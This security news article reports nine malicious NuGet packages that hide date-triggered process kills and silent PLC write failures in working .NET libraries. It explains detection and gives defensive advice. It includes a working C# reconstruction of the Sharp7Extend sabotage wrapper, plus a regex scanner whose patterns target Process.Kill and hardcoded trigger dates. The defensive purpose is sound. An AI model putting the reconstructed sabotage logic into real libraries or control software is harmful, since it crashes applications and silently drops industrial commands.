Malicious NuGet Packages Embed Time-Delayed Sabotage Code

editorial

Researchers at Socket have uncovered a supply-chain attack involving nine malicious NuGet packages that hide time-delayed sabotage routines inside otherwise legitimate .NET libraries. The packages had been downloaded 9,488 times before they were discovered. Their hidden triggers can abruptly terminate the host process and, in one case, silently corrupt write operations to industrial control systems.

The Malicious Packages and Their Functionality

The packages, published under the alias shanhai666 between 2023 and 2024, deliver genuine functionality so that they earn trust and pass initial scrutiny. Each contains roughly 20 lines of malicious code buried in a much larger body of working code. The sabotage is delivered through C# extension methods, such as .Exec() for database commands and .BeginTran() for S7 PLC clients: because an extension method reads like an ordinary helper call, any database query or PLC operation routed through it executes the embedded malicious logic as a side effect.

The payloads activate on hardcoded or encrypted trigger dates. Once the date has passed, each call draws a random number and, with a fixed probability, invokes Process.GetCurrentProcess().Kill(), terminating the application without an exception or a log entry. Some packages carry trigger dates in 2027 or 2028, so they can accumulate dependents for years before the payload ever fires and gives itself away.

One of the most dangerous packages in this campaign, Sharp7Extend, combines two distinct sabotage mechanisms. The first is an immediate probabilistic process kill that fires on every PLC operation and remains active until June 6, 2028. The second is a deferred write-failure mechanism: after a 30 to 90 minute delay, up to 80% of write attempts silently return a failure result. No exception is thrown and no error is logged, so PLC writes are lost without any visible sign; actuators simply fail to respond and production drifts in ways that are easily mistaken for hardware faults.
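The extension-method hook and both Sharp7Extend mechanisms, reconstructed as an added C# example. This is the editor's illustration of the pattern, not code from the actual package or from Socket's report: the IS7Client interface, the WriteAreaSafe name, the RecordingClient harness and the 20% kill probability are assumptions, while the June 6, 2028 cut-off, the 30 to 90 minute delay and the 80% failure share come from the description above.

```csharp
using System;
using System.Diagnostics;

// Stand-in for an S7 PLC client (this example's own interface, not Sharp7's API);
// 0 == success follows the int result-code convention of Sharp7-style libraries.
public interface IS7Client
{
    int WriteArea(int area, int dbNumber, int start, byte[] data);
}

// Illustrative reconstruction of the Sharp7Extend pattern. The extension method looks like a
// harmless convenience wrapper, so every caller that adopts it runs the hidden logic on each write.
public static class S7ClientSabotagePattern
{
    static readonly Random Rng = new Random();
    // Mechanism 1 stays armed until a hardcoded cut-off date (June 6, 2028 in the real package).
    static readonly DateTime KillUntil = new DateTime(2028, 6, 6);
    // Mechanism 2 arms itself 30-90 minutes after the library is first used.
    static readonly DateTime FirstUse = DateTime.UtcNow;
    static readonly TimeSpan ArmDelay = TimeSpan.FromMinutes(Rng.Next(30, 91));
    const double KillProbability = 0.20;       // assumption for illustration
    const double WriteFailProbability = 0.80;  // "up to 80%" per the description

    public static int WriteAreaSafe(this IS7Client client, int area, int dbNumber, int start, byte[] data)
    {
        DateTime now = DateTime.UtcNow;

        // Mechanism 1: before the cut-off date every operation rolls the dice; a hit kills the host
        // process outright, which operators see as an unexplained crash rather than an attack.
        if (now < KillUntil && Rng.NextDouble() < KillProbability)
            Process.GetCurrentProcess().Kill();

        // Mechanism 2: once armed, most writes return a failure code without touching the PLC and
        // without throwing, so nothing is logged and the actuator silently fails to respond.
        if (now - FirstUse > ArmDelay && Rng.NextDouble() < WriteFailProbability)
            return -1;

        // Only the remaining calls reach the genuine client, which is why the package still "works".
        return client.WriteArea(area, dbNumber, start, data);
    }

    // Constructed in-memory client for the demo: counts the writes that really happen.
    sealed class RecordingClient : IS7Client
    {
        public int Writes;
        public int WriteArea(int area, int dbNumber, int start, byte[] data) { Writes++; return 0; }
    }

    // Note that a run may end abruptly with no output: that is exactly the symptom mechanism 1 produces.
    public static void Main()
    {
        var plc = new RecordingClient();
        int reportedFailures = 0;
        for (int i = 0; i < 10; i++)
            if (plc.WriteAreaSafe(0x84 /* S7 DB area */, 1, 0, new byte[] { 1, 2 }) != 0)
                reportedFailures++;
        Console.WriteLine($"real writes: {plc.Writes}, reported failures: {reportedFailures}");
    }
}
```

Nothing in the wrapper is individually exotic: a date comparison, a random draw, a Process.Kill() and a return code. That is what lets 20 lines hide inside a working library, and it is why a review that only exercises the happy path, or only runs before the fuse has burned down, sees a package that behaves.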

Challenges in Detection

Detecting these packages is complicated by several factors. Most of the code is legitimate and functional, so the packages pass standard tests and code review. Typosquatting-style naming, where a malicious package piggybacks on a legitimate name (Sharp7Extend alongside the genuine Sharp7), raises the risk of accidental installation in operational technology (OT) environments.

Moreover, wrapping legitimate libraries conceals red flags during testing. Because activation is randomized, systematic interference looks like intermittent failures. The delay between installation and activation breaks the forensic timeline, so by the time impact is observed it is hard to trace back to the dependency change that caused it. The attacker also varied author metadata and forged signature artifacts to hinder automated detection.

To counter this campaign, organizations need both immediate and long-term measures. Immediately, audit dependencies, transitive ones included, for any of the nine malicious packages and remove them. Longer term, enforce strict dependency hygiene and add software bill of materials (SBOM) checks and static analysis to continuous integration and continuous deployment (CI/CD) pipelines.
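A heuristic source scan of the kind that could run as the static-analysis step in CI, which also serves the check for time-based logic and unusual Process.Kill() use recommended in the next paragraph. It looks for the combination this campaign relied on: an extension method that contains a hardcoded future date together with a Process.Kill() call or a random gate. This is an added example, not Socket's tooling; the rule set, the class names and the sample source it scans are constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;

// Heuristic scanner for the sabotage pattern. Any single rule fires on plenty of honest code;
// the verdict is keyed on the combination, which is what deserves a reviewer's attention.
public static class SabotagePatternScanner
{
    static readonly (string Name, Regex Pattern)[] Rules =
    {
        ("process-kill",
            new Regex(@"Process\s*\.\s*GetCurrentProcess\s*\(\s*\)\s*\.\s*Kill\s*\(", RegexOptions.Compiled)),
        // A DateTime constructed from, or parsed from, a literal year in 2020-2099.
        ("hardcoded-date",
            new Regex(@"new\s+DateTime\s*\(\s*20[2-9]\d\s*,|DateTime\.Parse\w*\s*\(\s*""20[2-9]\d", RegexOptions.Compiled)),
        // A Random draw on the same line as a Next()/NextDouble() call: a probabilistic gate.
        ("random-gate",
            new Regex(@"Random\b[^;]*\.(Next|NextDouble)\s*\(", RegexOptions.Compiled)),
        // A static method whose first parameter is "this ...": an extension method.
        ("extension-method",
            new Regex(@"\bstatic\s+[\w<>\[\],\s]+?\s+\w+\s*\(\s*this\s+", RegexOptions.Compiled)),
    };

    // Returns rule name -> 1-based line numbers that matched, so a reviewer can jump straight to them.
    public static Dictionary<string, List<int>> Scan(string source)
    {
        var hits = new Dictionary<string, List<int>>();
        string[] lines = source.Split('\n');
        for (int i = 0; i < lines.Length; i++)
        {
            foreach (var (name, pattern) in Rules)
            {
                if (!pattern.IsMatch(lines[i])) continue;
                if (!hits.TryGetValue(name, out var lineNumbers))
                    hits[name] = lineNumbers = new List<int>();
                lineNumbers.Add(i + 1);
            }
        }
        return hits;
    }

    public static bool IsSuspicious(Dictionary<string, List<int>> hits) =>
        hits.ContainsKey("extension-method")
        && hits.ContainsKey("hardcoded-date")
        && (hits.ContainsKey("process-kill") || hits.ContainsKey("random-gate"));

    // Constructed sample in the shape the article describes; not code from any real package.
    const string Sample = @"
public static class DbCommandExtensions
{
    static readonly DateTime Trigger = new DateTime(2027, 1, 1); // constructed date
    public static int Exec(this IDbCommand cmd)
    {
        if (DateTime.Now > Trigger && new Random().Next(100) < 20)
            Process.GetCurrentProcess().Kill();
        return cmd.ExecuteNonQuery();
    }
}";

    // Usage: scanner <file.cs> ...; with no arguments it scans the constructed sample.
    // Exit code 1 on any suspicious file, so the CI step fails.
    public static int Main(string[] args)
    {
        int suspiciousFiles = 0;
        string[] files = args.Length > 0 ? args : new[] { "<sample>" };
        foreach (string file in files)
        {
            string source = file == "<sample>" ? Sample : File.ReadAllText(file);
            var hits = Scan(source);
            foreach (var hit in hits)
                Console.WriteLine($"{file}: {hit.Key} at line(s) {string.Join(", ", hit.Value)}");
            if (IsSuspicious(hits))
            {
                suspiciousFiles++;
                Console.WriteLine($"{file}: SUSPICIOUS (extension method + hardcoded date + kill or random gate)");
            }
        }
        return suspiciousFiles == 0 ? 0 : 1;
    }
}
```

The scan runs over C# source, so it covers code you compile yourself; a prebuilt package assembly has to be decompiled first before the same rules apply. Treat a hit as a prompt for human review rather than a verdict: the point is to surface the combination early, before a trigger date that may be years away.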

Monitoring for time-based logic and unusual uses of Process.Kill() and extension methods is also vital. For industrial environments, verify PLC writes (read the value back and compare it with what was sent), establish a baseline PLC write success rate, and alert on sudden drops in write confirmations.
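Write verification and success-rate baselining for PLC commands, as an added C# example that is the editor's own, not code from Sharp7 or from Socket. IPlcClient, VerifiedPlcWriter and the in-memory FakePlc are this example's own constructs; the 80% silent-failure share of the fake PLC mimics the deferred write-failure behaviour described above.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Hypothetical PLC client abstraction (this example's own, not Sharp7's API);
// 0 == success follows the int result-code convention of Sharp7-style libraries.
public interface IPlcClient
{
    int WriteBytes(int dbNumber, int start, byte[] data);
    int ReadBytes(int dbNumber, int start, int size, byte[] buffer);
}

// Every write is read back and compared, and a rolling success rate is tracked so that a
// sudden drop (the signature of silent write sabotage) raises an alert instead of hiding as drift.
public sealed class VerifiedPlcWriter
{
    readonly IPlcClient _plc;
    readonly Queue<bool> _window = new Queue<bool>();
    readonly int _windowSize;
    readonly double _baseline;    // expected success rate under normal conditions
    readonly double _alertDelta;  // how far below baseline the rate may fall before alerting

    public event Action<string> Alert;

    public VerifiedPlcWriter(IPlcClient plc, int windowSize = 50, double baseline = 0.99, double alertDelta = 0.10)
    {
        _plc = plc;
        _windowSize = windowSize;
        _baseline = baseline;
        _alertDelta = alertDelta;
    }

    public double CurrentSuccessRate =>
        _window.Count == 0 ? 1.0 : _window.Count(ok => ok) / (double)_window.Count;

    // True only when the PLC reports success AND the read-back matches what was sent.
    public bool Write(int dbNumber, int start, byte[] data)
    {
        bool confirmed = false;
        if (_plc.WriteBytes(dbNumber, start, data) == 0)
        {
            var readBack = new byte[data.Length];
            confirmed = _plc.ReadBytes(dbNumber, start, data.Length, readBack) == 0
                        && readBack.SequenceEqual(data);
        }
        Record(confirmed);
        return confirmed;
    }

    void Record(bool confirmed)
    {
        _window.Enqueue(confirmed);
        if (_window.Count > _windowSize) _window.Dequeue();
        // Only judge a full window, so a single transient error does not page anyone.
        if (_window.Count == _windowSize && CurrentSuccessRate < _baseline - _alertDelta)
            Alert?.Invoke($"PLC write success rate {CurrentSuccessRate:P0} is below baseline {_baseline:P0}");
    }
}

public static class VerifiedWriterDemo
{
    // Constructed in-memory PLC: a data block plus a switch that mimics the deferred
    // write-failure behaviour (a failure code, nothing written, for about 80% of writes).
    sealed class FakePlc : IPlcClient
    {
        readonly byte[] _db = new byte[256];
        readonly Random _rng = new Random(1);
        public bool Sabotaged;

        public int WriteBytes(int dbNumber, int start, byte[] data)
        {
            if (Sabotaged && _rng.NextDouble() < 0.8) return -1;
            Array.Copy(data, 0, _db, start, data.Length);
            return 0;
        }

        public int ReadBytes(int dbNumber, int start, int size, byte[] buffer)
        {
            Array.Copy(_db, start, buffer, 0, size);
            return 0;
        }
    }

    public static void Main()
    {
        var plc = new FakePlc();
        var writer = new VerifiedPlcWriter(plc, windowSize: 20);
        writer.Alert += msg => Console.WriteLine("ALERT: " + msg);
        var setpoint = new byte[] { 0x00, 0x10, 0x27, 0x10 };

        for (int i = 0; i < 20; i++) writer.Write(1, 0, setpoint);   // healthy phase
        Console.WriteLine($"healthy success rate: {writer.CurrentSuccessRate:P0}");

        plc.Sabotaged = true;                                         // the 30-90 minute fuse has elapsed
        for (int i = 0; i < 20; i++) writer.Write(1, 0, setpoint);
        Console.WriteLine($"success rate under sabotage: {writer.CurrentSuccessRate:P0}");
    }
}
```

The read-back catches both shapes of sabotage: a fake failure code, as described for Sharp7Extend, and the worse case of a fake success code with no write performed. The rolling window is what turns "random" failures back into a trend that can be compared against the baseline; in production the alert would be rate-limited and routed to the same place as other OT telemetry rather than printed.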

By adopting these measures, organizations can enhance their software supply chain security and mitigate the risk posed by hidden malicious logic. This campaign serves as a stark reminder of how supply-chain attacks can weaponize trusted code and utilize time delays to inflict significant damage while remaining undetected.
